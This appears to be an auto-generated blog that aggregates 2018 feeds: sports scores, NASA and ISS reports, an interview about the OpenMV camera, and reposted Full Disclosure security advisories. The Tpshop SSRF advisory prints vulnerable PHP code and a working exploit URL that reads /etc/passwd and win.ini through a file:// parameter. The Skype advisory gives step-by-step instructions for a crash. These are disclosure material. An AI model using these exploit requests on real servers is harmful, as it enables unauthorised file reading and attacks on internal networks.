Patrick McGuire: 2018-03-25

Saturday, March 31, 2018

Puss in Boots

Puss in Boots posters, canvas prints, framed pictures, postcards & more by Anonymous. Handmade in the UK.

from Google Alert - anonymous https://ift.tt/2H0E5DP
via IFTTT

How add email field to anonymous user's comment?

I want to give a permission to anonymous users to comment, however the default form does not include user's email. Can I manage, without contributed module, to create a comment form which user have to leave their email/name and notify me per each comment, as well? If need to install contributed ...

from Google Alert - anonymous https://ift.tt/2uCVPTh
via IFTTT

Twins' combined no-hitter broken up with 2 outs in 8th inning on single by Orioles' Jonathan Schoop (ESPN)

from ESPN https://ift.tt/1eW1vUH
via IFTTT

No-Hitter Watch: Twins' Kyle Gibson (6.0 IP) and Ryan Pressley have not allowed a hit through 7 innings vs. Orioles (ESPN)

from ESPN https://ift.tt/1eW1vUH
via IFTTT

No-Hitter Watch: Twins' Kyle Gibson has not allowed a hit through 6 innings vs. Orioles (ESPN)

from ESPN https://ift.tt/1eW1vUH
via IFTTT

Russian Hacker Who Allegedly Hacked LinkedIn and Dropbox Extradited to US

A Russian man accused of hacking LinkedIn, Dropbox, and Formspring in 2012 and possibly compromising personal details of over 100 million users, has pleaded not guilty in a U.S. federal court after being extradited from the Czech Republic. Yevgeniy Aleksandrovich Nikulin, 30, of Moscow was arrested in Prague on October 5, 2016, by Interpol agents working in collaboration with the FBI, but he

from The Hacker News https://ift.tt/2GF5Dkv
via IFTTT

Magna Carta

Magna Carta posters, canvas prints, framed pictures, postcards & more by Anonymous. Handmade in the UK.

from Google Alert - anonymous https://ift.tt/2H0ikV0
via IFTTT

Twilight in a Western Sky

A slender crescent Moon and inner planets Venus and Mercury never wander far from the Sun in planet Earth's skies. In the fading evening twilight of March 18, they line up near the western horizon in this atmospheric skyscape. While the celestial scene was enjoyed around the world, this photo captures the trio, with fainter Mercury at the far right, above the crags of Big Bend National Park in southwest Texas. Tonight the Moon will be full though, and rise opposite the Sun. Look for it high in the sky at midnight, near bright star Spica. via NASA https://ift.tt/2uAl3ls

Friday, March 30, 2018

Becoming anonymous on the internet and gaining back your freedom

Becoming anonymous on the internet and gaining back your freedom. Since the Facebook election campaign saga it seems thousands of people are getting more conscious about being more private on the internet, more articles are written about it every day. A few days ago @iamdylancurran wrote this ...

from Google Alert - anonymous https://ift.tt/2E8BkgK
via IFTTT

Re: [FD] new email; gw22067@hotmail.com | Double-free segfault bypass

[FD] Null Pointer Deference (Denial of Service)-Kingsoft Internet Security 9+ Kernel Driver KWatch3.sys

*****[ White Team Security (WTS) Security Advisory- ADV-01-03-2018 ]***** Kingsoft Internet Security 9+ - Null Pointer Deference Kernel Driver KWatch3.sys

Source: Gmail -> IFTTT-> Blogger

[FD] SSRF（Server Side Request Forgery） in Tpshop <= 2.0.6 （CVE-2017-16614）

# SSRF（Server Side Request Forgery） in Tpshop <= 2.0.6 (CVE-2017-16614) The Tpshop open source mall system is a multi-merchant mode mall system developed by Shenzhen Leopard Network Co., Ltd.This system is based on the Thinkphp development framework. ## Product Download: http://www.tp-shop.cn/Index/Index/download.html ## Vulnerability Type：SSRF（Server Side Request Forgery） ## Attack Type : Remote ## Vulnerability Description Tpshop’s former version 2.0.6 is vulnerable to SSRF（Server Side Request Forgery） in the fBill parameter within the "/plugins/payment/weixin/lib/WxPay.tedatac.php?fBil=" path. This vulnerability can lead to arbitrary files reading, network port scanning，information detection, internal network server attack. The vulnerability code: if($_GET['fBill'] && $_GET['WxPayDataBase']) { header('Content-type: image/jpeg'); $handle = fopen($_GET['fBill'], 'r'); fseek($handle , $_GET['WxPayDataBase']); fpassthru($handle); } ## Exploit http://tpshop_path/plugins/payment/weixin/lib/WxPay.tedatac.php?fBill=file:///c:/windows/win.ini&WxPayDataBase=test modify the above fBill parameter，example: request http protocol: fBill=http://www.google.com request https protocol: fBill=https://www.google.com request ftp protocol: fBill=ftp://www.google.com file read：fBil=file:///etc/passwd or fBil=file:///c:/windows/win.ini ## Versions Tpshop <= 2.0.6 ## Impact SSRF(Server Side Request Forgery) in Tpshop before version 2.0.6 allow remote attackers to arbitrary files read，scan network port，information detection,internal network server attack. ## Credit This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC) ## References CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16614 service@baimaohui.net

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-8 iCloud for Windows 7.4

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-7 iTunes 12.7.4 for Windows

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-6 Safari 11.1

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-5 macOS High Sierra 10.13.4, Security Update 2018-002 Sierra, and Security Update 2018-002 El Capitan

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-4 Xcode 9.3

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-3 tvOS 11.3

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-2 watchOS 4.3

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-1 iOS 11.3

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Multiple Cross-Site Scripting Vulnerabilities in Crea8Social Social Network Script

[FD] CVE-2018-5708

Hello Seclists: Attached is my writeup for the following CVE: CVE-2018-5708 > An issue was discovered on D-Link DIR-601 B1 2.02NA devices. Being on > the same local network as, but being unauthenticated to, the > administrator's panel, a user can obtain the admin username and > cleartext password in the response (specifically, the configuration > file restore_default), which is displayed in XML. > >

Source: Gmail -> IFTTT-> Blogger

[FD] CA20180328-01: Security Notice for CA API Developer Portal

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] CA20180329-01: Security Notice for CA Workload Automation AE and CA Workload Control Center

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

Free-agency grades: Ravens get a B- after signings of WRs John Brown, Michael Crabtree - Jamison Hensley (ESPN)

from ESPN https://ift.tt/17lH5T2
via IFTTT

Law360's Satisfaction Survey

Welcome to Law360's anonymous survey on career and life satisfaction. The following questions touch on your financial, physical and mental well-being. All answers and data will remain anonymous. The survey will take approximately 10 minutes to complete. Thank you for your time and participation.

from Google Alert - anonymous https://ift.tt/2GVCOhl
via IFTTT

Farm supervisor

Apply for the Farm supervisor - kajiado vacancy at Anonymous Employer today! Subscribe to alerts to receive similar jobs directly to your email.

from Google Alert - anonymous https://ift.tt/2uy33rU
via IFTTT

Thursday, March 29, 2018

▶ Adam Jones smacks 11th-inning walk-off homer in Orioles' 3-2 win over Twins (ESPN)

from ESPN https://ift.tt/1eW1vUH
via IFTTT

Anonymous

Anonymous posters, postcards, canvas prints & framed pictures. Available to buy online. 100% Handmade artist prints you'll love.

from Google Alert - anonymous https://ift.tt/2uw02rX
via IFTTT

Messrs. Maskelyne and Cooke from England's home of mystery

Messrs. Maskelyne and Cooke from England's home of mystery posters, canvas prints, framed pictures, postcards & more by Anonymous. Handmade in the UK.

from Google Alert - anonymous https://ift.tt/2GkPLo8
via IFTTT

Microsoft's Meltdown Patch Made Windows 7 PCs More Insecure

Meltdown CPU vulnerability was bad, and Microsoft somehow made the flaw even worse on its Windows 7, allowing any unprivileged, user-level application to read content from and even write data to the operating system's kernel memory. For those unaware, Spectre and Meltdown were security flaws disclosed by researchers earlier this year in processors from Intel, ARM, and AMD, leaving nearly

from The Hacker News https://ift.tt/2Gyjzgn
via IFTTT

ISS Daily Summary Report – 3/28/2018

68 Progress (68P) Undock: 68P successfully undocked from the Docking Compartment 1 (DC-1) port this morning at 8:50 AM CDT. This Progress vehicle will conduct Non-ISS free-flight experiments from April 3 to April 24. A series of burns scheduled for Thursday March 29 and April 2 will place the vehicle into the required orbit. The … Continue reading

from ISS On-Orbit Status Report https://ift.tt/2GDsL2Q
via IFTTT

Apple macOS Bug Reveals Passwords for APFS Encrypted Volumes in Plaintext

A severe programming bug has been found in APFS file system for macOS High Sierra operating system that exposes passwords of encrypted external drives in plain text. Introduced two years ago, APFS (Apple File System) is an optimized file system for flash and SSD-based storage solutions running MacOS, iOS, tvOS or WatchOS, and promises strong encryption and better performance.

from The Hacker News https://ift.tt/2E2Rx7e
via IFTTT

NGC 2023 in the Horsehead s Shadow

Carved by a bright young star in Orion's dusty molecular clouds, NGC 2023 is often overlooked in favor of the nearby dramatic silhouette of the Horsehead Nebula. In its own right it is seen as a beautiful star forming emission and reflection nebula though, a mere 1500 light-years distant. Surprisingly colorful and complex filaments are detailed in this rare NGC 2023 portrait. Scattered points of emission are also from the region's Herbig-Haro objects, associated with the energetic jets from newborn stars. The sharp telescopic view spans about 10 light-years at the estimated distance of NGC 2023. Off the right edge of the frame lies the more familiar cosmic Horsehead. via NASA https://ift.tt/2GREmZP

Wednesday, March 28, 2018

📈 MLB Power Rankings: Orioles No. 20 to begin 2018 season (ESPN)

from ESPN https://ift.tt/1eW1vUH
via IFTTT

ISS Daily Summary Report – 3/27/2018

Extravehicular Activity (EVA) Preparations: Today the crew continued preparing for US EVA #49 – Node 3 External Wireless Communications (EWC) installation, planned for Thursday March 29, 2018. They completed additional Airlock and Extravehicular Mobility Unit (EMU) configuration and performed an EMU Water Tank and Liquid Cooling Ventilation Garment (LVCG) Water Fill. Television Camera Interface Converter … Continue reading

from ISS On-Orbit Status Report https://ift.tt/2GDfszx
via IFTTT

Will the Ravens draft a QB? We rate all 32 teams' chances of selecting a signal-caller (ESPN)

from ESPN https://ift.tt/17lH5T2
via IFTTT

An interview with Kwabena Agyeman, co-creator of OpenMV and microcontroller expert

After publishing last week’s blog post on reading barcodes with Python and OpenMV, I received a lot of emails from readers asking questions about embedded computer vision and how microcontrollers can be used for computer vision.

Instead of trying to address these questions myself, I thought it would be best to bring in a true expert — Kwabena Agyeman, co-founder of OpenMV, a small, affordable, and expandable embedded computer vision device.

Kwabena is modest in this interview and denies being an expert (a true testament to his kind character and demeanor), but trust me, meeting him and chatting with him is a humbling experience. His knowledge of embedded programming and microcontroller design is incredible. I could listen to him talk about embedded computer vision all day.

I don’t cover embedded devices here on PyImageSearch often so it’s a true treat to have Kwabena here today.

Join me in welcoming Kwabena Agyeman to the PyImageSearch blog. And to learn more about embedded computer vision, just keep reading.

An interview with Kwabena Agyeman, co-creator of OpenMV and microcontroller expert

Figure 1: The OpenMV camera is a powerful embedded camera board that runs MicroPython.

Adrian: Hey Kwabena, thanks for doing this interview! It’s great to have you on the PyImageSearch blog. For people who don’t know you and OpenMV, who are you and what do you do?

Kwabena: Hi Adrian, thanks for having me in today. Me and my co-founder Ibrahim created the OpenMV Cam and run the OpenMV project.

OpenMV is a focused effort on making embedded computer/machine vision more accessible. The ultimate goal of the project is to enable machine-vision in more embedded devices than there are today.

For example, let’s say you want to add a face detection sensor to your toaster. This is probably overkill for any application, but, bear with me.

First, you can’t just go out today and buy a $50 face detection sensor. Instead, you’re looking at least setting up a Single-Board-Computer (SBC) Linux system running OpenCV. This means adding face detection to your toaster now just became a whole new project.

If your goal was to just detect if there’s a face in view or not, and then toggle a wire to release the toast when you look at the toaster you don’t necessarily want to go down the SBC path.

Instead, what you really want is a microcontroller that can accomplish the goal of detecting faces out-of-the-box and toggling a wire with minimal setup.

So, the OpenMV project is basically about proving high-level machine-vision functionality out of the box for a variety of tasks to developers who want to add powerful features to their projects without having to focus on all the details.

Figure 2: The CMUcam4 is a fully programmable embedded computer vision sensor developed by Kwabena Agyeman while at Carnegie Mellon University.

Adrian: That’s a great point regarding having to set up a SBC Linux system, install OpenCV, and write the code, just to achieve a tiny bit of functionality. I don’t do much work with embedded devices so it’s insightful seeing it from a different perspective. What inspired you to start working in the computer vision, machine learning, and the embedded field?

Kwabena: Thanks for asking Adrian, I got into machine-vision back at Carnegie Mellon University working under Anthony Rowe who created the CMUcam 1, 2, and 3. While I was a student there I created the CMUcam 4 for simple color tracking applications.

While limited, the CMUcams were able to do their jobs of tracking colors quite well (if deployed in a constant lighting environment). I really enjoyed working on the CMUcam4 because it blended board design, microcontroller programming, GUI development, and data-visualization in one project.

Figure 3: A small, affordable, and expandable embedded computer vision device.

Adrian: Let’s get get into more detail about OpenMV and the OpenMV Cam. What exactly is OpenMV Cam and what is it used for?

Kwabena: So, the OpenMV Cam is a low-powered machine-vision camera. Our current model is the OpenMV Cam M7 which is powered by a 216 MHz Cortex-M7 processor that can execute two-instructions per clock making it about half as fast (single-threaded no-SIMD) compute-wise as the Raspberry Pi zero.

The OpenMV Cam is also a MicroPython board. This means you program it in Python 3. Note that this doesn’t mean desktop python libraries are available. But, if you can program in Python you can program the OpenMV Cam and you’ll feel at home using it.

What’s cool though is that we’ve built a number of high-level machine-vision algorithms into the OpenMV Cam’s firmware (which is written in C — python is just to allow you to glue vision logic together like you do with OpenCV’s python library bindings).

In particular, we’ve got:

Multi-color blob tracking
Face detection
AprilTag tracking
QR Code, Barcode, Data Matrix detection and decoding
Template matching
Phase-correlation
Optical-flow
Frame differencing
and more built-in.

Basically, it’s like OpenCV on a low-power microcontroller (runs off a USB port) with Python bindings

Anyway, our goal is to wrap up as much functionality into an easy-to-use function calls as possible. For example, we have a “find_blobs()” method which returns a list of color blobs objects in the image. Each blob object has an centroid, bounding box, pixel count, rotation angle, and etc. So, the function call automatically segments an image (RGB or Grayscale) by a list of color-thresholds, finds all blobs (connected components), merges overlapping blobs based on their bounding boxes, and additionally calculates each blob’s centroid, rotation angle, etc. Subjectively, using our “find_blobs()” is a lot more straight forwards than finding color blobs with OpenCV if you’re a beginner. That said, our algorithm is also less flexible if you need to do something we didn’t think of. So, there’s a trade-off.

Moving on, sensing is just one part of the problem. Once you detect something you need to act. Because the OpenMV Cam is a microcontroller you can toggle I/O pins, control SPI/I2C buses, send UART data, control servos, and more all from the same script you’ve got your vision logic in. With the OpenMV Cam you sense, plan, and act all from one short python script.

Adrian: Great explanation. Can you elaborate more on the target market for the OpenMV? If you had to describe your ideal end user who absolutely had to have an OpenMV, who would they be?

Kwabena: Right now we’re targeting the hobbyist market with the system. Hobbyist have been our biggest buyers so far and helped us sell over five thousand OpenMV Cam M7s last year. We’ve also got a few companies buying the cameras too.

Anyway, as our firmware gets more mature we hope to sell more cameras to more companies building products.

Right now we’re still rapidly building out our firmware functionality to more or less compliment OpenCV for basic image processing functionality. We’ve already got a lot of stuff on board but we’re trying to make sure you have any tool you need like shadow removal with inpainting for creating a shadow free background frame differencing applications.

Figure 4: An example of AprilTags (Image credit: MIT).

Adrian: Shadow removal, that’s fun. So, what was the most difficult feature or aspect that you had to wrangle with when putting together OpenMV?

Kwabena: Porting AprilTags to the OpenMV Cam was the most challenging algorithm to get running onboard.

I started with the AprilTag 2 source code meant for the PC. To get it running on the OpenMV Cam M7 which has only 512 KB of RAM versus a desktop PC. I had go through all 15K+ lines of code and redo how memory allocations worked to be more efficient.

Sometimes this was as simple as moving large array allocations from malloc to a dedicated stack. Sometimes I had to change how some algorithms worked to be more efficient.

For example, AprilTags computes a lookup table of every possible hamming code word with 0, 1, 2, etc. bit errors when trying to match detected tag bit patterns with a tag dictionary. This lookup-table (LUT) can be over 30 MBs for some tag dictionaries! Sure, indexing a LUT is fast, but, a linear search through the tag dictionaries for a matching tag can work too.

Anyway, after porting the algorithm the OpenMV Cam M7 it can run AprilTags at 160×120 at 12 FPS. This let’s you detect tags printed on 8”x11” paper from about 8” away with a microcontroller which can run off of your USB port.

Adrian: Wow! Having to manually go through all 15K lines of code and re-implement certain pieces of functionality must have been quite the task. I hear there are going to be some really awesome new OpenMV features in the next release. Can you tell us about them?

Kwabena: Yes, our next product, the OpenMV Cam H7 powered by the STM32H7 processor will double our performance. In fact, it’s coremark score is on par with the 1 GHz Raspberry Pi zero (2020.55 versus 2060.98). That said, the Cortex-M7 core doesn’t have NEON or a GPU. But, we should be able to keep up for CPU limited algorithms.

However, the big feature add is removable camera module support. This allows us to offer the OpenMV Cam H7 with an inexpensive rolling shutter camera module like we do now. But, for more professional users we’ll have a global shutter options for folks who are trying to do machine vision in high speed applications like taking pictures of products moving on a conveyor belt. Better, yet, we’re also planning to support FLIR Lepton Thermal sensors for machine vision too. Best of all, each camera module will use the same “sensor.snapshot()” construct we use to take pictures now allowing you to switch out one module for another without changing your code.

Finally, thanks to ARM, you can now neural networks on the Cortex-M7. Here’s a video of the OpenMV Cam running a CIFAR-10 network onboard:

We’re going to be building out this support for the STM32H7 processor so that you can run NN’s trained on your laptop to do things like detecting when people enter rooms and etc. The STM32H7 should be able to run a variety of simple NN’s for lots of common detection task folks want for an embedded system to do.

We’ll be running a KickStarter for the next generation OpenMV Cam this year. Sign-up on our email list here and follow us on Twitter to stay up-to-date for when we launch the KickStarter.

Adrian: Global shutter and thermal imaging support is awesome! Theoretically, could I turn an OpenMV Cam with a global shutter sensor into a webcam for use with my Raspberry Pi 3? Inexpensive global shutter sensors are hard to find.

Kwabena: Yes, the OpenMV Cam can be used as a webcam. Our USB speed is limited to 12 Mb/s though, so, you’ll want to stream JPEG compressed images. You can also connect the OpenMV Cam to your Raspberry Pi via SPI for a faster 54 Mb/s transfer rate. Since the STM32H7 has a hardware JPEG encoder onboard now the OpenMV Cam H7 should be able to provide a nice high FPS precisely triggered frame stream to your Raspberry Pi.

Figure 5: Using OpenMV to build DIY robocar racers.

Adrian: Cool, let’s move on. One of the most exciting aspects of developing a new tool, library, or piece of software is to see how your work is used by others. What are some of the more surprising ways you’ve seen OpenMV used?

Kwabena: For hobbyist our biggest feature has been color tracking. We do that very well at above 50 FPS with our current OpenMV Cam M7. I think this has been the main attraction for a lot of customers. Color tracking has historically been the only thing you were able to do on a microcontroller so it makes sense.

QR Code, Barcode, Datamatrix, and AprilTag support have also been selling points.

For example, we’ve had quadcopter folks start using the OpenMV Cam to point down at giant AprilTags printed out on the ground for precision landing. You can have one AprilTag inside of another one and as the quadcopter gets closer to the ground the control algorithm tries to keep the copter centered on the tag in view.

However, what’s tickled me the most is doing DIY Robocar racing with the OpenMV Cam and having some of my customers beat me in racing with their OpenMV Cams.

Adrian: If a PyImageSearch readers would like to get their own OpenMV camera, where can they purchase one?

Kwabena: We just finished another production run of 2.5K OpenMV Cams and you can buy them online on our webstore now. We’ve also got lens accessories, shields for controlling motors, and more.

Adrian: Most people don’t know this, but you and I ran a Kickstarter campaign at the same time back in 2015! Mine was for the PyImageSearch Gurus course while yours was for the initial release and manufacturing of the OpenMV Camera. OpenMV’s Kickstarter easily beat my own, which just goes to show you how interested the embedded community was in the product — fantastic job and congrats on the success. What was running your first Kickstarter campaign like?

Kwabena: Running that KickStarter campaign was stressful. We’ve come a long, long, long way since then. I gave a talk on this a few years back which more or less summarizes my experience:

Anyway, it’s a lot of work and a lot of stress.

For our next KickStarter we’re trying to prepare as much as possible beforehand so it’s more of a turnkey operation. We’ve got our website, online-shop, forums, documentation, shipping, etc. all setup now so we don’t have to build the business and the product at the same time anymore. This will let us focus on delivering the best experience for our backers.

Adrian: I can attest to the fact that running a Kickstarter campaign is incredibly stressful. It’s easily a full-time job for ~3 months as you prepare the campaign, launch it, and fund it. And once it’s funded you then need to deliver on your promise! It’s a rewarding experience and I wouldn’t discourage others from doing it, but prepared to be really stressed out for 3-4 months. Shifting gears a bit, as an expert in your field, who do you talk to when you get “stuck” on a hard problem?

Kwabena: I wouldn’t say I’m an expert. I’m learning computer vision like everyone else. Developing the OpenMV Cam has actually been a great way to learn how algorithms work. For example, I learned a lot porting the AprilTag code. There’s a lot of magic in that C code. I’m also quite excited actually to now start adding more machine learning features to the OpenMV Cam using the ARM CMSIS NN library for the Cortex-M7.

Anyway, to answer where I go for help… The internet! And research papers! Lots of research papers. I do the reading so my OpenMV Cam users don’t have to.

Adrian: From your LinkedIn I know you have a lot of experience in hardware design languages. What advice do you have for programmers interested in using FPGAs for computer vision?

Kwabena: Hmm… You can definitely get a lot of performance out FPGAs. However, it’s definitely a pay-to-play market. You’re going to need some serious budget to get access to any of the high-end hardware and/or intellectual property. That said, if you’ve got an employer willing to spend there’s a lot of development going on that will allow you to run very large deep neural networks on FPGAs. It’s definitely sweet to get a logic pipeline up and running that’s able to process gigabytes of data a second.

Now, there’s also a growing medium-end FPGA market that’s affordable to play in if you don’t have a large budget. Intel (previously Altera) has an FPGA called the Cyclone for sale that’s more or less affordable if you’re willing pay for the hardware. You can interface the Cyclone to your PC via PCIe using Xillybus IP which exposes FIFOs on your FPGA as linux device files on your PC. This makes it super easy to move data over to the FPGA. Furthermore, Intel offers offers DDR memory controller IP for free so you can get some RAM buffers up and running. Finally, you just need to add a camera module and you can start developing.

But… that said, you’re going to run into a rather unpleasant brick wall on how to write verilog code and having to pay for the tool chains. The hardware design world is not really open source, nor will will you find lots of stack overflow threads about how to do things. Did I mention there’s no vision library for hardware available? Gotta roll everything yourself!

Adrian: When you’re not working at OpenMV, you’re at Planet Labs in San Francisco, CA, which is where PyImageConf, PyImageSearch’s very own computer vision and deep learning conference will be held. Will you be at PyImageConf this year (August 26-28th)? The conference will be a great place the show off OpenMV functionality. I know attendees would enjoy it.

Kwabena: Yes, I’ll be in town and present for the conference. I live in SF now.

Adrian: Great to hear! If a PyImageSearch reader wants to chat, what is the best place to connect with you?

Kwabena: Email us at openmv@openmv.io or comment on our forum. Additionally, please follow us on Twitter, our YouTube channel, and sign-up on our mailing list.

Summary

In today’s blog post I interviewed Kwabena Agyeman, co-founder of OpenMV.

If you have any questions for Kwabena, be sure to leave a comment on this post! Kwabena is a regular PyImageSearch reader and is active in the comments.

And if you enjoyed today’s post and want to be notified when future blog posts are published here on PyImageSearch, be sure to enter your email address in the form below!

The post An interview with Kwabena Agyeman, co-creator of OpenMV and microcontroller expert appeared first on PyImageSearch.

from PyImageSearch https://ift.tt/2GhHL2Y
via IFTTT

Quick Tip

from Google Alert - anonymous https://ift.tt/2GenAaq
via IFTTT

Tuesday, March 27, 2018

I have a new follower on Twitter

Nimbus XYZ
Follow a cloud-focused accountant for advice on on how to get your #business #online using #cloud #technology and increase #productivity in your business!
Washington, DC
https://t.co/hjJ3GheFfB
Following: 3541 - Followers: 2855

March 27, 2018 at 03:13PM via Twitter http://twitter.com/nimbus_xyz

Re: [FD] new email; gw22067@hotmail.com | Double-free segfault bypass

[FD] new email; gw22067@hotmail.com | Double-free segfault bypass

[FD] DSA-2018-040: RSA® Authentication Agent for Web for IIS and Apache Web Server Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] DSA-2018-058: Dell EMC ScaleIO Multiple Security Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] ManageEngine Service Desk Plus < 9403 Cross-Site Scripting

[FD] Blind SQL Injection in Square 9 GlobalForms <= 6.2.x (CVE-2018-8820)

I have a new follower on Twitter

AdvancedMD
Cloud software for independent medical practices that delivers industry-leading patient outcomes & financial performance. #MedicalBilling #EHR #Telemedicine
Salt Lake City
https://t.co/IqOYUqga76
Following: 9158 - Followers: 15279

March 27, 2018 at 01:13PM via Twitter http://twitter.com/advancedmd

📉 NFL Power Rankings: Ravens fall five spots to No. 24 after initial surge of free agency (ESPN)

from ESPN https://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 3/26/2018

Lab Major Constituent Analyzer (MCA) Status: The Lab MCA 72 hour dryout completed period ended on Friday 23 March. This weekend, telemetry indicated that the water readings were too high to proceed with a successful activation and calibration. As of this morning, the water readings were no longer off-scale high; however they were too high … Continue reading

from ISS On-Orbit Status Report https://ift.tt/2GddQsN
via IFTTT

[FD] Microsoft Skype Mobile v81.2 & v8.13 - Remote Denial of Service Vulnerability

Document Title: =============== Microsoft Skype Mobile v81.2 & v8.13 - Remote Denial of Service Vulnerability References (Source): ==================== https://ift.tt/2n1hu0y Video: https://ift.tt/2ISY6wG MSRC ID: 43520 CRM:0461036906 Acknowledgements: https://ift.tt/2Gw0BGV Release Date: ============= 2018-03-27 Vulnerability Laboratory ID (VL-ID): ==================================== 2116 Common Vulnerability Scoring System: ==================================== 4.7 Vulnerability Class: ==================== Denial of Service Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Skype is a telecommunications application software product that specializes in providing video chat and voice calls between computers, tablets, mobile devices, the Xbox One console, and smartwatches via the Internet and to regular telephones. Skype additionally provides instant messaging services. Users may transmit both text and video messages, and may exchange digital documents such as images, text, and video. Skype allows video conference calls. (Copy of the Homepage: https://ift.tt/1nU1neS ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a denial of service vulnerability in the official microsoft skype v8.12 and v8.13 mobile software clients for apple ios or google android. Vulnerability Disclosure Timeline: ================================== 2018-02-01: Researcher Notification & Coordination (Security Researcher) 2018-02-03: Vendor Notification (Microsoft Security Response Center) 2018-02-08: Vendor Response/Feedback (Microsoft Security Response Center) 2018-03-20: Vendor Fix/Patch (Microsoft Service Developer Team) 2018-03-25: Vendor Fix/Patch (Security Acknowledgements) 2018-03-27: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= No User Interaction Disclosure Type: ================ Coordinated Disclosure Technical Details & Description: ================================ A remote denial of service vulnerability has been discovered in the official microsoft skype v8.12 and v8.13 mobile software clients for apple ios or google android. The denial of service web vulnerability allows attackers to crash the skype application by malformed message content transmit. The vulnerability is located in the function to convert the size of transferred images when displaying. When transferring an image from the skype windows software client (computer system) to the mobile skype clients (iOS & android), a memory error occurs when adapting the smilie graphics. Attackers can copy the incorrectly formatted smilie by quota from the message, that is sent in broken format with a permanent resize request. The Attackers can now transfer the copied smilie into conversations to crash it with a memory error. When transferring the smilies by quote or by copying, the harmful content can be transferred to other input fields, which then also cause a local memory error on display. The demo video demonstrates how an attacker can use the content locally to crash himself or other Skype clients like Samsung's. The memory error can be used locally and remotely, but it is not possible to overwrite active registers from the process to compromise them permanently. The exploit of the vulnerability leads to crashes, massive sync problems and untreated memory errors in the mobile Skype iOS & Android software client. Skype for windows, linux & macos operating systems are not affected by the issue but must be used to bring the malicious content to the mobile skype client message board. Proof of Concept (PoC): ======================= The vulnerability can be reproduced by local or remote attackers without user interaction and with low privileged skype user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Setup a windows 10 default system and install skype v7.40.0.151 2. Setup a mobile iOS device and install the latest skype v8.12.0.14 & v8.13 3. Now open the windows 10 skype client and add the contact of the mobile device 4. Open the mobile device and confirm the user add request 5. Move back into the windows 10 client and send the mobile skype client 2 kiss smilies for example 6. Close the skype client and reopens the client 7. Now the smilies graphics are glitching inside by a resize of the image (view demo vide) 8. Now the message with the smilies must be quoted or copied and then transfered to any other skype input field were smilies are supported 9. Pasting around 50 of them results in an unexpected memory errors and uncaught exceptions or access violations Note: Tested for Android Samsung and Apple iOS. The resize of the larger image results in a memory corruption 10. Successful reproduce of the vulnerability! PoC Video: Shows the local issue and the remote triggered bug ... https://www.youtube.com/watch?v=2vcdQb98zE0 Solution - Fix & Patch: ======================= Secure memory allocation when resizing emoticons images during rendering in transfers through the skype mobile software client. Microsoft resolved the vulnerability and prepared an updated version v8.17 & v8.18. In both versions the security issue is known as patched. Security Risk: ============== The security risk of the vulnerability in the skype mobile software client for ios and android is estimated as medium (cvss 4.7). Credits & Authors: ================== Benjamin Kunz Mejri [research@vulnerability-lab.com] - https://ift.tt/2CTH1QS. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: https://ift.tt/1jnqRwA - www.vuln-lab.com - www.evolution-sec.com Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] Sandoba CP:Shop CMS v2016.1 - Multiple Cross Site Scripting Vulnerabilities

